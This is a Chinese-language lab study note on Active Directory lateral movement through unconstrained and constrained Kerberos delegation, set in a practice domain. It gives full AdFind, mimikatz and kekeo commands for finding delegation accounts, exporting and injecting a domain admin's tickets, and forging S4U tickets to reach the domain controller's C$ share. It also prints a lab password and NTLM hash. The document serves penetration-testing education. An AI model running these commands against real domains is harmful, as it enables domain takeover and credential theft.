第135天：内网安全-横向移动&非约束委派&约束委派&数据库攻防

案例一: 横向移动-原理利用-非约束委派

该案例建立了解即可，真实环境应该不可能有人这样配置

非约束委派的原理和利用场景

原理：
机器 A （域控）访问具有非约束委派权限的机器 B 的服务，会把当前认证用户（域管用
户）的的 TGT 放在 ST 票据中，一起发送给机器 B ，机器 B 会把 TGT 存储在 lsass 进程
中以备下次重用。从而机器 B 就能使用这个 TGT 模拟认证用户（域管用户）访问服务。
利用场景
攻击者拿到了一台配置非约束委派的机器权限，可以诱导域管来访问该机器，然后得到管
理员的 TGT ，从而模拟域管用户。

实验环境 god.org

配置环境

首先需要把webserver的computer中委派，设置为信任任何服务

利用这条命令进行更新

setspn -U -A priv/test webadmin

更新后在该用户的属性就会出现委派一栏

而别的用户中不会出现这一栏

msf上线并且提权到system权限

利用ADFIND工具进行查询非约束委派的账户

本来应该设置代理，在本地运行，但是我是linux系统我就直接上传了

adfind下载地址

https://www.softpedia.com/get/Programming/Other-Programming-Files/AdFind.shtml

执行命令

AdFind.exe -b "DC=god,DC=org" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

让域控主机访问webadmin，正常应该是设置钓鱼

访问过以后让webserver利用mimikatz导出票据

mimikatz sekurlsa::tickets /export

利用管理员的身份伪造票据

mimikatz kerberos::ptt C:\Users\webadmin\Desktop\[0;9eb18]-2-0-40e00000-Administrator@krbtgt-GOD.ORG.kirbi

利用该身份就可以访问域控，记得用主机名去访问

案例二： 横向移动-原理利用-约束委派

非约束委派存在不安全性，所以微软在Windows server 2003中引入了约束委派，约束委派攻击主要利用被控主机设置了域控的CIFS服务的约束委派，则攻击者可以先使用S4u2seflt申请域管用户访问被控主机的ST1，然后使用S4u2Proxy以administrator身份访问域控的CIFS服务，即相当于控制了域控

环境配置

然后点击确定，添加服务cifs

给对应的用户也添加上该服务环境配置完成

正常cs控制webserver，并且提权到了system权限后

查询域内设置了约束委派账户的命令

shell c:\users\webadmin\desktop\AdFind.exe -b "DC=god,DC=org" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

查询域内设置了约束委派机器的命令

shell AdFind -b "DC=god,DC=org" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

利用kekeo去请求TGT

记得利用system权限去抓取mimikatz

明文：
shell kekeo "tgt::ask /user:webadmin /domain:god.org /password:admin!@#45" "exit"   


hash值：
shell kekeo "tgt::ask /user:webadmin /domain:god.org /NTLM:579da618cfbfa85247acf1f800a280a4" "exit"

这里我还是直接上传，真实环境在本地设置代理，在本地运行

通过这刚刚生成的TGT伪造s4u请求以Administrator用户身份去访问域控的的CIFS的ST，S4U2Self 获取到的 ST1 以及 S4U2Proxy 获取到的 AD-2008 CIFS 服务的 ST2 会保存在当前⽬录下。

shell kekeo.exe "tgs::s4u /tgt:TGT_webadmin@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi /user:Administrator@god.org /service:cifs/OWA2010CN-God.god.org" "exit"

利用mimikatz导入票据

mimikatz kerberos::ptt 
TGS_Administrator@god.org@GOD.ORG_cifs~OWA2010CN-God.god.org@GOD.ORG.kirbi

shell dir \\OWA2010SP3\c$

查看当前票据

访问目标文件加夹

先写到这里后面还有一个综合性靶场以后再做把^_^